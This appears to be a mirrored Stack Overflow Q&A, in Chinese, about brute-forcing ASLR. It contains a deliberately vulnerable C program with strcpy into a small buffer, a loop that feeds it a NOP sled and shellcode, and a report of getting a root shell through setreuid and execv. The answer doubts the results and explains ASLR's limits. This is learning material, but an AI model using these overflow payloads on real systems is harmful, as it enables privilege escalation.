【问题标题】:ASLR brute forceASLR蛮力
【发布时间】:2013-04-19 17:47:38
【问题描述】:

我刚刚阅读了有关地址空间布局随机化的内容,我尝试了一个非常简单的脚本来尝试暴力破解它。这是我用来测试一些东西的程序。

#include <stdio.h>
#include <string.h>

int main (int argc, char **argv)
{
    char buf[8];
    printf("&buf = %p\n", buf);
    if (argc > 1 && strcpy(buf, argv[1]));
    return 0;
}

我用这个命令编译它:

gcc -g -fno-stack-protector -o vul vul.c

我确保启用了 ASLR:

$ sysctl kernel.randomize_va_space
kernel.randomize_va_space = 2

然后,我想出了这个简单的脚本:

str=`perl -e 'print "\x40\xfa\xbb\xbf"x10 \
    . "\x90"x65536                        \
    . "\x31\xc0\x40\x89\xc3\xcd\x80"'`

while [ $? -ne 1 ]; do
    ./vul $str
done

格式是

return address many times | 64KB NOP slide | shellcode that runs exit(1)

在运行此脚本几秒钟后,它会按照我的意愿退出并显示错误代码 1。我还尝试了其他调用 execv("/bin/sh", ...) 的 shellcode,我也成功了。

我觉得很奇怪,即使在返回地址之后也可以创建这么长的 NOP 幻灯片。我认为 ASLR 更有效,我错过了什么吗?是不是因为地址空间太小了?

编辑:我做了一些额外的研究,结果如下:

  • 我请朋友在他的 64b 计算机上使用 -m32 -z execstack 运行此代码,稍微更改返回地址后,他得到了相同的结果。

  • 即使我没有使用-z execstack,我还是设法执行了shellcode。我通过使用不同的 shellcode 来确保这一点,它们都做了他们应该做的事情(即使是众所周知的场景 chown root ./vulchmod +s ./vul,运行 setreuid(0, 0) 然后 execv("/bin/sh", ...) 和最后 whoami 的 shellcode 返回 ' root' 在生成的外壳中)。 这很奇怪,因为execstack -q ./vul 告诉我可执行堆栈标志位未设置。有人知道为什么吗?

【问题讨论】:

    标签: c buffer-overflow aslr


    【解决方案1】:

    首先,我有点惊讶您不需要将选项-z execstack 传递给编译器来获取执行exit(1) 的shellcode。

    此外,我猜您是在 32 位机器上,因为您没有将选项 -m32 传递给 gcc 以获得 32 位代码。

    最后,我确实运行了你的程序但没有成功(我等了几秒钟以上)。

    所以,我对你的结论有点怀疑(除非你运行的是一个非常奇特的 Linux 系统或者可能很幸运)。

    不管怎样,有两件事你没有提到:

    1. 提供无限利用窗口的错误非常罕见。
    2. 大多数现代系统在 amd64(64 位)处理器上运行,这大大降低了命中 nop 区域的可能性。

    您可以查看 ASLR 维基百科页面上的“ASLR Effectiveness”部分。

    【讨论】:

      猜你喜欢
      • 1970-01-01
      • 1970-01-01
      • 1970-01-01
      • 1970-01-01
      • 1970-01-01
      • 2013-04-11
      • 2021-02-22
      • 2015-11-11
      • 2016-11-05
      相关资源
      最近更新 更多